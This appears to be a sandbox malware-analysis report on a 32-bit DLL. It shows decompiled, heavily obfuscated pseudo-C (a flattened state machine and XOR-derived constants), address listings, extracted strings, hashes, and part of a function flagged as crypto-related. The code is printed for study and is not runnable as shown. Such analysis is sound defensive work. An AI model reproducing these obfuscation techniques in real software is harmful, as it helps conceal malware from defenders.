									if(__eflags != 0) {
										L100:
										_t1034 = 0x36183806;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									_t1034 = 0xfb8ec94;
									goto L104;
								}
								__eflags = _t1034 - 0x36183806;
								if(_t1034 == 0x36183806) {
									_t927 = E1001D02D();
									goto L110;
								}
								__eflags = _t1034 - 0x3939669c;
								if(__eflags == 0) {
									_t1034 = 0x1e95092c;
									_v108 = _v324;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0x3954b45a;
								if(_t1034 != 0x3954b45a) {
									goto L105;
								}
								E1000434A();
								goto L100;
							}
							if(__eflags == 0) {
								_t1115 = _v332;
								__eflags = E10012FA1(_v228, _v332, __eflags,  &_v140);
								if(__eflags != 0) {
									_t1118 = _v464;
									_t1138 = 0x1e95092c;
								}
								goto L94;
							}
							__eflags = _t1034 - 0x2bcd9dcd;
							if(_t1034 == 0x2bcd9dcd) {
								E10004844();
								_t1034 = 0x1f5179fa;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x2ec155bf;
							if(_t1034 == 0x2ec155bf) {
								E1000E044();
								asm("sbb ecx, ecx");
								_t1034 = (_t1034 & 0x0f0237cc) + 0x1ccb6601;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x2f84b03e;
							if(_t1034 == 0x2f84b03e) {
								_t1115 = _v260;
								E10010EC3(_v340, _v260, _v348,  &_v96);
								_t1034 = 0x2084686f;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x301909e3;
							if(_t1034 != 0x301909e3) {
								goto L105;
							}
							_push(_v284);
							_t1115 =  &_v156;
							_push(_v520);
							_push(_v512);
							_t947 = E10007FFE( &_v148,  &_v156);
							_t1145 = _t1145 + 0xc;
							__eflags = _t947;
							if(__eflags == 0) {
								E10015237();
								_t1138 = 0x1e95092c;
								_t1118 = E1000DF8A( &_v148,  &_v156, __eflags, _v356, _v268);
								L71:
								_t1034 = 0x8331fa3;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							_t1138 = 0x1e95092c;
							_t1118 = E1000DF8A( &_v148,  &_v156, __eflags, _v496, _v372);
							_t1034 = 0x8e3e7b7;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_t927 = E1001512B(_t1034);
							goto L110;
						}
						__eflags = _t1034 - 0x21dc4a65;
						if(__eflags > 0) {
							__eflags = _t1034 - 0x23cd63af;
							if(_t1034 == 0x23cd63af) {
								_t1115 = _v96;
								E1000DE81(_v292, _v96, _v300);
								_t1034 = 0xda73f77;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x24a19024;
							if(__eflags == 0) {
								_t1034 = 0x16840c8b;
								goto L2;
							}
							__eflags = _t1034 - 0x25120b57;
							if(__eflags == 0) {
								_v88 = E1000DE79();
								_t1034 = 0x5a723c8;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x25886259;
							if(_t1034 != 0x25886259) {
								goto L105;
							}
							E1001434E();
							_t1034 = 0x11e6b71b;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_t1115 = _v148;
							E1000DE81(_v544, _v148, _v172);
							goto L71;
						}
						__eflags = _t1034 - 0x1e95092c;
						if(_t1034 == 0x1e95092c) {
							_t1115 =  &_v104;
							E1001C6D9( &_v104, _v168);
							_t1034 = 0x2f84b03e;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						__eflags = _t1034 - 0x1f5179fa;
						if(_t1034 == 0x1f5179fa) {
							_t927 = E1000D2DD();
							__eflags = _t927;
							if(__eflags == 0) {
								goto L110;
							}
							_t1034 = 0x90774b6;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						__eflags = _t1034 - 0x1f9ed57a;
						if(__eflags == 0) {
							_t1034 = 0x3939669c;
							_v112 = _v388;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						__eflags = _t1034 - 0x2084686f;
						if(_t1034 != 0x2084686f) {
							goto L105;
						}
						_t1115 = _v404;
						E10009106(_v404, _v240, _v412,  &_v128,  &_v156);
						_t1145 = _t1145 + 0x10;
						asm("sbb ecx, ecx");
						_t1034 = (_v396 & 0x0c4ba634) + 0x23cd63af;
						goto L1;
						L105:
						__eflags = _t1034 - 0x25829b99;
					} while (__eflags != 0);
					goto L110;
				}
			}

0x10015256
0x10015260
0x1001526a
0x10015275
0x1001527a
0x10015285
0x10015290
0x10015298
0x100152a0
0x100152a8
0x100152b0
0x100152b8
0x100152c3
0x100152ce
0x100152d9
0x100152e4
0x100152ec
0x100152f7
0x10015302
0x1001530d
0x10015318
0x10015323
0x1001532e
0x10015339
0x10015344
0x10015358
0x1001535d
0x10015366
0x10015371
0x1001537c
0x10015384
0x1001538f
0x1001539a
0x100153a2
0x100153ad
0x100153b5
0x100153be
0x100153c1
0x100153c5
0x100153cd
0x100153d5
0x100153e0
0x100153eb
0x100153f6
0x10015401
0x1001540c
0x10015417
0x10015422
0x10015435
0x1001543c
0x10015447
0x1001544f
0x10015454
0x1001545c
0x10015461
0x10015469
0x10015471
0x1001547e
0x10015482
0x1001548a
0x10015492
0x1001549d
0x100154a5
0x100154b0
0x100154bb
0x100154c6
0x100154d1
0x100154e1
0x100154e6
0x100154ec
0x100154f4
0x100154fc
0x10015504
0x1001550f
0x1001551a
0x10015525
0x1001552d
0x10015535
0x10015542
0x10015545
0x10015549
0x10015551
0x10015564
0x1001556b
0x10015576
0x10015581
0x10015591
0x10015595
0x100155a1
0x100155a6
0x100155ac
0x100155b4
0x100155bf
0x100155ca
0x100155d5
0x100155e0
0x100155ec
0x100155ef
0x100155f8
0x100155fc
0x10015604
0x1001560c
0x10015617
0x10015622
0x1001562d
0x10015638
0x10015640
0x1001564b
0x10015656
0x10015669
0x10015670
0x1001567b
0x10015686
0x10015691
0x1001569c
0x100156a7
0x100156b2
0x100156bd
0x100156c8
0x100156d3
0x100156de
0x100156e9
0x100156f4
0x100156fc
0x10015704
0x10015709
0x10015711
0x10015719
0x10015721
0x10015732
0x10015735
0x10015741
0x10015745
0x1001574d
0x10015758
0x10015763
0x1001576e
0x10015779
0x10015784
0x1001578f
0x1001579a
0x100157a5
0x100157b0
0x100157bb
0x100157c6
0x100157d9
0x100157dc
0x100157e3
0x100157ee
0x100157f9
0x10015801
0x1001580c
0x10015817
0x10015822
0x1001582d
0x10015838
0x10015840
0x1001584b
0x10015856
0x1001586c
0x10015873
0x1001587e
0x10015889
0x10015899
0x100158a0
0x100158ab
0x100158b6
0x100158cc
0x100158d3
0x100158de
0x100158e9
0x100158f4
0x100158ff
0x1001590a
0x10015912
0x1001591d
0x10015928
0x10015933
0x1001593e
0x10015949
0x10015954
0x1001595f
0x10015967
0x10015972
0x1001597d
0x10015988
0x10015993
0x100159a5
0x100159a8
0x100159af
0x100159ba
0x100159c2
0x100159ca
0x100159d7
0x100159dc
0x100159e2
0x100159ea
0x100159f5
0x100159fd
0x10015a08
0x10015a10
0x10015a15
0x10015a22
0x10015a23
0x10015a27
0x10015a2f
0x10015a3c
0x10015a40
0x10015a48
0x10015a50
0x10015a58
0x10015a63
0x10015a6e
0x10015a79
0x10015a84
0x10015a8f
0x10015a9a
0x10015aa5
0x10015ab0
0x10015ab8
0x10015ac3
0x10015ace
0x10015ad9
0x10015ae4
0x10015aef
0x10015afa
0x10015b05
0x10015b10
0x10015b1b
0x10015b26
0x10015b31
0x10015b3c
0x10015b47
0x10015b52
0x10015b5d
0x10015b68
0x10015b73
0x10015b7e
0x10015b89
0x10015b94
0x10015b9f
0x10015baa
0x10015bb5
0x10015bbd
0x10015bcb
0x10015bd4
0x10015bd8
0x10015be0
0x10015beb
0x10015bf3
0x10015bfa
0x10015c05
0x10015c10
0x10015c1b
0x10015c26
0x10015c33
0x10015c3c
0x10015c40
0x10015c45
0x10015c4d
0x10015c55
0x10015c62
0x10015c67
0x10015c6d
0x10015c75
0x10015c7d
0x10015c88
0x10015c90
0x10015c98
0x10015ca3
0x10015caf
0x10015cb4
0x10015cb8
0x10015cbd
0x10015cc5
0x10015ccd
0x10015cd8
0x10015ce3
0x10015cee
0x10015cf9
0x10015d04
0x10015d0f
0x10015d1a
0x10015d25
0x10015d2d
0x10015d35
0x10015d40
0x10015d4b
0x10015d5b
0x10015d5c
0x10015d63
0x10015d6e
0x10015d79
0x10015d84
0x10015d8f
0x10015d9a
0x10015da5
0x10015db0
0x10015dbb
0x10015dc3
0x10015dcb
0x10015dd0
0x10015dd5
0x10015ddd
0x10015de8
0x10015df3
0x10015dfe
0x10015e06
0x10015e0e
0x10015e16
0x10015e1e
0x10015e26
0x10015e2e
0x10015e38
0x10015e41
0x10015e45
0x10015e4d
0x10015e58
0x10015e63
0x10015e6e
0x10015e79
0x10015e84
0x10015e8f
0x10015e9a
0x10015ea5
0x10015eb0
0x10015ebd
0x10015ecd
0x10015ed3
0x10015edb
0x10015ee3
0x10015eeb
0x10015efe
0x10015f01
0x10015f08
0x10015f13
0x10015f1e
0x10015f29
0x10015f32
0x10015f33
0x10015f41
0x10015f48
0x10015f53
0x10015f5b
0x10015f63
0x10015f6b
0x10015f73
0x10015f7b
0x10015f83
0x10015f8b
0x10015f93
0x10015f9b
0x10015fa3
0x10015fab
0x10015fb0
0x10015fbd
0x10015fbe
0x10015fc2
0x10015fca
0x10015fd5
0x10015fe8
0x10015fef
0x10015ffa
0x10016002
0x1001600a
0x10016012
0x1001601a
0x10016022
0x1001602d
0x10016038
0x10016040
0x1001604b
0x10016056
0x10016061
0x10016069
0x10016074
0x1001607c
0x10016084
0x1001608c
0x10016094
0x1001609c
0x100160a7
0x100160b2
0x100160bd
0x100160c8
0x100160d0
0x100160db
0x100160e6
0x100160f1
0x100160fc
0x10016107
0x10016114
0x10016118
0x1001612a
0x10016130
0x1001613d
0x10016155
0x10016156
0x1001615d
0x10016164
0x1001616f
0x1001617a
0x1001618b
0x10016192
0x10016199
0x100161a4
0x100161a4
0x100161a4
0x100161a9
0x100161a9
0x100161a9
0x100161a9
0x100161af
0x00000000
0x00000000
0x100161b5
0x100165a9
0x100165ab
0x100165d5
0x100165dc
0x100165e4
0x100165ad
0x100165b4
0x100165bb
0x100165c3
0x100165c3
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100161bb
0x100161bd
0x100163a1
0x100163a7
0x10016471
0x10016477
0x10016596
0x00000000
0x10016596
0x1001647d
0x10016483
0x10016517
0x10016537
0x10016563
0x10016576
0x10016584
0x10016589
0x1001658c
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016489
0x1001648f
0x100164d3
0x100164d5
0x1001621e
0x1001621e
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100164e2
0x100164f2
0x100164ff
0x10016506
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016491
0x10016497
0x00000000
0x00000000
0x100164a6
0x100164ad
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100163ad
0x10016462
0x10016467
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100163b3
0x100163b9
0x10016446
0x10016454
0x10016404
0x10016405
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100163bf
0x100163c5
0x10016433
0x10016438
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100163c7
0x100163cd
0x10016416
0x1001641b
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100163cf
0x100163d5
0x00000000
0x00000000
0x100163e2
0x10016402
0x00000000
0x10016402
0x100161c3
0x10016978
0x100169a4
0x100169ab
0x100169ab
0x100161c9
0x100161cf
0x100162a3
0x100162a9
0x10016365
0x10016367
0x100168e8
0x100168e8
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016374
0x10016379
0x10016381
0x10016386
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x1001638c
0x10016394
0x10016399
0x00000000
0x10016399
0x100162af
0x100162b5
0x1001631b
0x10016327
0x1001632e
0x10016336
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100162b7
0x100162bd
0x100162f4
0x100162f9
0x100162fb
0x00000000
0x00000000
0x10016308
0x1001630d
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100162bf
0x100162c5
0x00000000
0x00000000
0x100162cf
0x100162d4
0x100162d6
0x00000000
0x00000000
0x100162dc
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100161d5
0x10016293
0x10016299
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100161e1
0x10016275
0x1001627a
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100161ed
0x10016260
0x00000000
0x10016260
0x100161f5
0x10016251
0x10016256
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100161fd
0x10016232
0x10016239
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100161ff
0x10016205
0x00000000
0x00000000
0x1001621c
0x10016222
0x1001695a
0x1001695a
0x00000000
0x1001695a
0x00000000
0x1001621c
0x100165ef
0x100165f1
0x1001678b
0x10016791
0x100168f2
0x100168f8
0x10016951
0x10016953
0x10016922
0x10016922
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016955
0x00000000
0x10016955
0x100168fa
0x10016900
0x1001699f
0x00000000
0x1001699f
0x10016906
0x1001690c
0x10016933
0x10016935
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x1001690e
0x10016914
0x00000000
0x00000000
0x1001691d
0x00000000
0x1001691d
0x10016797
0x100168c2
0x100168de
0x100168e0
0x100168e2
0x100168e6
0x100168e6
0x00000000
0x100168e0
0x1001679d
0x100167a3
0x100168b3
0x100168b8
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100167a9
0x100167af
0x1001688e
0x10016895
0x1001689d
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100167b5
0x100167bb
0x10016861
0x1001686f
0x10016876
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100167c1
0x100167c7
0x00000000
0x00000000
0x100167cd
0x100167d4
0x100167db
0x100167e6
0x100167ea
0x100167ef
0x100167f2
0x100167f4
0x10016825
0x1001682e
0x1001684b
0x100166f2
0x100166f3
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100167fa
0x10016815
0x10016817
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x100165f7
0x1001698a
0x00000000
0x1001698a
0x100165fd
0x10016603
0x100166fd
0x10016703
0x1001676d
0x1001677b
0x10016781
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016705
0x1001670b
0x1001675c
0x00000000
0x1001675c
0x1001670d
0x10016713
0x1001674b
0x10016752
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016715
0x1001671b
0x00000000
0x00000000
0x1001672c
0x10016731
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016609
0x100166e2
0x100166ed
0x00000000
0x100166ed
0x1001660f
0x10016611
0x100166c4
0x100166cb
0x100166d1
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016617
0x1001661d
0x1001669f
0x100166a4
0x100166a6
0x00000000
0x00000000
0x100166ac
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x1001661f
0x10016625
0x10016683
0x10016688
0x100161a4
0x100161a4
0x100161a4
0x00000000
0x100161a4
0x100161a4
0x10016627
0x1001662d
0x00000000
0x00000000
0x10016651
0x1001665f
0x10016664
0x10016669
0x10016671
0x00000000
0x1001695f
0x1001695f
0x1001695f
0x00000000
0x1001696b

Strings

6g, xrefs: 100154A5
@e7, xrefs: 10015AB8
3n, xrefs: 100159C2
9, xrefs: 10015C98
LS, xrefs: 10015F53
J-,, xrefs: 10016394
J-,, xrefs: 1001695A
VV, xrefs: 100152C3
!n, xrefs: 100160E6
B, xrefs: 10015344
v1, xrefs: 100153D5
1f, xrefs: 10015C05
%', xrefs: 10015A08
kg, xrefs: 10015B68
jV, xrefs: 10015E8F
>, xrefs: 100157EE
GS, xrefs: 10015B52
J-,, xrefs: 100161A4
nl, xrefs: 100158AB
R, xrefs: 10015447
N6, xrefs: 1001609C
"v, xrefs: 10015504
C, xrefs: 10015C4D
7, xrefs: 100158DE
j^, xrefs: 100152EC
-o, xrefs: 10015290
>lO, xrefs: 100157E3
G?B, xrefs: 10015BEB
T`, xrefs: 10015709
/, xrefs: 1001562D
dP, xrefs: 10015D84
, xrefs: 10015F29
T, xrefs: 10015D1A
3, xrefs: 10015FB0
4, xrefs: 10015BD8
7, xrefs: 10015CCD
|, xrefs: 10015DF3
%c, xrefs: 10015CF9

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$$ 9$!n$"v$%'$%c$-o$/$1f$3n$4$6g$7$>lO$@e7$G?B$GS$J-,$J-,$J-,$LS$N6$R$T`$T$VV$dP$jV$j^$kg$nl$v1$3$7$>$B$|
API String ID: 0-3933709873
Opcode ID: 66f4f4cbdfef4eaf4ae9ffe7777e528aa4aaf4be1a39a45842c7e379e678c8ce
Instruction ID: e4b58a47493e04e41ac2486295326ea5eb44352c2ac2e939e94c56c2728ffe18
Opcode Fuzzy Hash: 66f4f4cbdfef4eaf4ae9ffe7777e528aa4aaf4be1a39a45842c7e379e678c8ce
Instruction Fuzzy Hash: 19B215715093818BE3B8CF65C99579FBBE1FBC4354F10891DE18A8A2A0DBB49985CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10007FFE Relevance: 30.7, Strings: 24, Instructions: 706
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E10007FFE(signed int __ecx, signed int __edx) {
				void* __edi;
				void* _t669;
				intOrPtr _t720;
				void* _t726;
				void* _t741;
				void* _t742;
				void* _t745;
				short _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				intOrPtr _t791;
				void* _t795;
				signed int _t801;
				signed int _t807;
				signed int _t809;
				signed int _t811;
				signed int _t826;
				signed int _t828;
				signed char* _t881;
				void* _t882;
				signed int _t889;
				short* _t890;
				short* _t891;
				signed int _t892;
				signed int _t897;
				signed int _t899;
				void* _t901;
				void* _t902;
				void* _t903;
				void* _t904;
				void* _t905;
				void* _t906;
				void* _t908;
				void* _t909;

				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				_t889 = __edx;
				_t892 = __ecx;
				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				 *((intOrPtr*)(_t902 + 0x148)) = __edx;
				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				 *((intOrPtr*)(_t902 + 0x12c)) = __ecx;
				_push(__edx);
				_push(__ecx);
				E10012550(_t669);
				 *((intOrPtr*)(_t902 + 0xe0)) = 0x50c;
				_t903 = _t902 + 0x14;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x43c2c0f0;
				_t899 = 0;
				_t795 = 0x2392656c;
				 *(_t903 + 0x128) = 0;
				_t776 = 3;
				 *(_t903 + 0xd0) =  *(_t903 + 0xcc) / _t776;
				 *(_t903 + 0xd0) =  *(_t903 + 0xd0) ^ 0x16964c14;
				 *(_t903 + 0xcc) = 0x7d6c;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) + 0xffff22e1;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) >> 3;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x1fffd9b4;
				 *(_t903 + 0x74) = 0xc1a1;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) << 7;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) | 0x752db8c7;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x756d9f65;
				 *(_t903 + 0x54) = 0x6653;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) | 0xef6ea2da;
				_t777 = 0x4f;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x2c;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xfdea2aeb;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) ^ 0xdae5ba81;
				 *(_t903 + 0x90) = 0x1ae0;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) + 0x9dd2;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) / _t777;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x00001273;
				 *(_t903 + 0x7c) = 0x91ad;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0x8a7f;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) + 0xffff15ba;
				 *(_t903 + 0x7c) =  *(_t903 + 0x7c) ^ 0x00003314;
				 *(_t903 + 0x118) = 0xd3f6;
				 *(_t903 + 0x118) =  *(_t903 + 0x118) >> 6;
				 *(_t903 + 0x118) =  *(_t903 + 0x118) ^ 0x00006a76;
				 *(_t903 + 0xdc) = 0x5b3d;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) << 7;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x002dec83;
				 *(_t903 + 0xe4) = 0xe1a3;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) + 0xb61a;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x00019054;
				 *(_t903 + 0xac) = 0xd034;
				_t778 = 0x41;
				 *(_t903 + 0xa8) =  *(_t903 + 0xac) * 0x21;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) >> 5;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x0000a5df;
				 *(_t903 + 0x5c) = 0xce7d;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) << 0xb;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) + 0xffff4afa;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) / _t778;
				 *(_t903 + 0x5c) =  *(_t903 + 0x5c) ^ 0x0019198d;
				 *(_t903 + 0x54) = 0xea37;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) * 0x7f;
				_t779 = 0x75;
				 *(_t903 + 0x58) =  *(_t903 + 0x54) / _t779;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0x6eec;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x00015ac8;
				 *(_t903 + 0x100) = 0xf0b;
				 *(_t903 + 0x100) =  *(_t903 + 0x100) >> 1;
				 *(_t903 + 0x100) =  *(_t903 + 0x100) ^ 0x000046ed;
				 *(_t903 + 0x98) = 0xe523;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) >> 0xf;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) + 0xbd6d;
				 *(_t903 + 0x98) =  *(_t903 + 0x98) ^ 0x0000db22;
				 *(_t903 + 0xf8) = 0xa379;
				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) + 0xffffc366;
				 *(_t903 + 0xf8) =  *(_t903 + 0xf8) ^ 0x00004ea3;
				 *(_t903 + 0xc8) = 0x9609;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) | 0xfc9b1668;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) >> 2;
				 *(_t903 + 0xc8) =  *(_t903 + 0xc8) ^ 0x3f26f1c9;
				 *(_t903 + 0x110) = 0x93e8;
				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc9c780;
				 *(_t903 + 0x110) =  *(_t903 + 0x110) ^ 0x6cc954eb;
				 *(_t903 + 0xc4) = 0x193a;
				_t780 = 0x59;
				 *(_t903 + 0xc4) =  *(_t903 + 0xc4) / _t780;
				_t781 = 0x1b;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc4) * 0x78;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x00004d55;
				 *(_t903 + 0x28) = 0x9917;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff1acc;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) << 0xe;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 1;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x767c70b9;
				 *(_t903 + 0x60) = 0x87fb;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 0xc;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) << 7;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) + 0x251d;
				 *(_t903 + 0x60) =  *(_t903 + 0x60) ^ 0x3fd826f7;
				 *(_t903 + 0x80) = 0x50e5;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) >> 0xc;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff07fe;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffff3d49;
				 *(_t903 + 0x90) = 0xf831;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 9;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) << 3;
				 *(_t903 + 0x90) =  *(_t903 + 0x90) ^ 0x0f836fd5;
				 *(_t903 + 0x58) = 0xa7c7;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xffff9b8f;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) + 0xdad5;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) << 0xb;
				 *(_t903 + 0x58) =  *(_t903 + 0x58) ^ 0x08f13b63;
				 *(_t903 + 0xb0) = 0x3244;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) | 0x63ae54c5;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) + 0xffffb71c;
				 *(_t903 + 0xb0) =  *(_t903 + 0xb0) ^ 0x63ae2d72;
				 *(_t903 + 0x30) = 0x96f4;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xfffff5ad;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) / _t781;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e666d06;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0x2e665524;
				 *(_t903 + 0x88) = 0xa705;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) << 9;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) + 0x9771;
				 *(_t903 + 0x88) =  *(_t903 + 0x88) ^ 0x014ee7b1;
				 *(_t903 + 0x48) = 0x3d5e;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0xffff4ae5;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) | 0x14fe6d6d;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) << 2;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0xffffae8a;
				 *(_t903 + 0x11c) = 0x676a;
				_t782 = 0x3b;
				 *(_t903 + 0x120) =  *(_t903 + 0x11c) / _t782;
				 *(_t903 + 0x120) =  *(_t903 + 0x120) ^ 0x00006974;
				 *(_t903 + 0xbc) = 0x626d;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xc5ef;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) + 0xffff67d0;
				 *(_t903 + 0xbc) =  *(_t903 + 0xbc) ^ 0x0000ba9c;
				 *(_t903 + 0x9c) = 0xc74f;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0xf6981ca9;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) >> 9;
				 *(_t903 + 0x9c) =  *(_t903 + 0x9c) ^ 0x007b070d;
				 *(_t903 + 0xd4) = 0xabeb;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) + 0xffff5ef9;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) >> 7;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x000061f9;
				 *(_t903 + 0x11c) = 0x4b6;
				_t783 = 0x58;
				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) * 0x12;
				 *(_t903 + 0x11c) =  *(_t903 + 0x11c) ^ 0x000028b0;
				 *(_t903 + 0x80) = 0x3500;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) + 0xffff2fa1;
